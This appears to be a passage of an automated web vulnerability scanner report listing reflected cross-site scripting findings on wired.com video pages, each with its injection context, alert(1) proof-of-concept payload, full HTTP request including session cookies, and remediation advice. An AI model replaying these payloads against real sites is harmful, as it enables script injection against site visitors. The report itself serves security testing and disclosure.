Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff46df5"-alert(1)-"ca26f7c7b3f/666144939001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106725
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665df"-alert(1)-"860e0e85e38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001665df"-alert(1)-"860e0e85e38 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:44:27 GMT Date: Mon, 22 Nov 2010 00:39:36 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106740
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 38a2c--><script>alert(1)</script>0befce43f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29460 Vary: Accept-Encoding Cache-Control: max-age=294 Expires: Mon, 22 Nov 2010 00:41:32 GMT Date: Mon, 22 Nov 2010 00:36:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33dc"><a>ed7e9567c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videoa33dc"><a>ed7e9567c2d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29421 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:07 GMT Date: Mon, 22 Nov 2010 00:36:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videoa33dc"><a>ed7e9567c2d ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22ce8"-alert(1)-"d4bd5acd3f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos22ce8"-alert(1)-"d4bd5acd3f7/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:43:07 GMT Date: Mon, 22 Nov 2010 00:38:07 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106756
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bdde"><a>8d08fc4d8e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos6bdde"><a>8d08fc4d8e6/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:41:44 GMT Date: Mon, 22 Nov 2010 00:36:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos6bdde"><a>8d08fc4d8e6 c_latest"> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8465"-alert(1)-"19aa27f8e45 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latestf8465"-alert(1)-"19aa27f8e45/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:19 GMT Date: Mon, 22 Nov 2010 00:39:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106774
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 209d5"><a>004865321b8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest209d5"><a>004865321b8/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:42:48 GMT Date: Mon, 22 Nov 2010 00:38:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest209d5"><a>004865321b8"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d784a"-alert(1)-"7f75e25cfd6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633d784a"-alert(1)-"7f75e25cfd6/tron-legacy-clip-long-time/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:33 GMT Date: Mon, 22 Nov 2010 00:39:33 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106743
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e2288"-alert(1)-"25b0acd16bd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-timee2288"-alert(1)-"25b0acd16bd/664849976001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:44:58 GMT Date: Mon, 22 Nov 2010 00:39:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106728
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4594d"-alert(1)-"7690f3a7e1f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/6648499760014594d"-alert(1)-"7690f3a7e1f HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:45:10 GMT Date: Mon, 22 Nov 2010 00:40:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106682
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 1 is copied into an HTML comment. The payload e050c--><script>alert(1)</script>342fbb90a6d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29467 Vary: Accept-Encoding Cache-Control: max-age=286 Expires: Mon, 22 Nov 2010 00:47:00 GMT Date: Mon, 22 Nov 2010 00:42:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <!-- Exception message: URL not found: /videoe050c--><script>alert(1)</script>342fbb90a6d/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 --> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb01f"><a>19896930279 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /videocb01f"><a>19896930279/latest-videos/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29428 Vary: Accept-Encoding Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:46:30 GMT Date: Mon, 22 Nov 2010 00:41:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_videocb01f"><a>19896930279 ss_latest-videos c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3de52"><a>bb7b6c2ab13 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos3de52"><a>bb7b6c2ab13/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=278 Expires: Mon, 22 Nov 2010 00:46:54 GMT Date: Mon, 22 Nov 2010 00:42:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos3de52"><a>bb7b6c2ab13 c_latest"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8927"-alert(1)-"0b73e10bb0b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videosa8927"-alert(1)-"0b73e10bb0b/latest/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=293 Expires: Mon, 22 Nov 2010 00:48:08 GMT Date: Mon, 22 Nov 2010 00:43:15 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5a040"-alert(1)-"3f490dd9e9d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /video/latest-videos/latest5a040"-alert(1)-"3f490dd9e9d/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=291 Expires: Mon, 22 Nov 2010 00:49:01 GMT Date: Mon, 22 Nov 2010 00:44:10 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106778
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <script type="text/javascript">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23bae"><a>bf20c8db554 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /video/latest-videos/latest23bae"><a>bf20c8db554/1815816633/tron-legacy-clip-quorra-saves-sam/653193147001 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=300 Expires: Mon, 22 Nov 2010 00:48:17 GMT Date: Mon, 22 Nov 2010 00:43:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 106767
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang=" ...[SNIP]... <body class="s_video ss_latest-videos c_latest23bae"><a>bf20c8db554"> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65d68"-alert(1)-"8f64e6fcf0e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
